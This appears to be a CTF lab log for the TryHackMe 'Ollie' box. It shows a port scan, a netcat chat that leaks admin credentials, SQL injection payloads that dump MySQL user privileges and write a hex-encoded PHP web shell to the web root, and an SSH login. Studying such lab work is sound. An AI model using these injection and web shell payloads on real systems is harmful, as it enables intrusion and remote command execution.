╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie
╰─➤ rustscan -a 10.10.20.38 | tee rust.log
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
1337/tcp open waste syn-ack
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie
╰─➤ nc 10.10.20.38 1337
Hey stranger, I'm Ollie, protector of panels, lover of deer antlers.
What is your name? mrhnl
What's up, Mrhnl! It's been a while. What are you here for? getsystem
Ya' know what? Mrhnl. If you can answer a question about me, I might have something for you.
What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? duck
You are wrong! I'm sorry, but this is serious business. Let's try again...
What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? wolf
You are wrong! I'm sorry, but this is serious business. Let's try again...
What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog
You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie...
Please hold on a minute
Ok, I'm back.
After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel.
Username: admin
Password: OllieUnixMontgomery!
PS: Good luck and next time bring some treats!
" union all select 1,2,3,group_concat(user,0x3a,file_priv) from mysql.user -- -
" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/rev.php' -- -
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie
╰─➤ ssh -i /home/hnl/.ssh/id_rsa ollie@10.10.20.38
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-99-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 16 Apr 2022 09:45:56 AM UTC
System load: 0.45 Processes: 141
Usage of /: 64.4% of 9.78GB Users logged in: 0
Memory usage: 45% IPv4 address for docker0: 172.17.0.1
Swap usage: 0% IPv4 address for eth0: 10.10.20.38
6 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sat Feb 12 15:57:44 2022
ollie@hackerdog:~$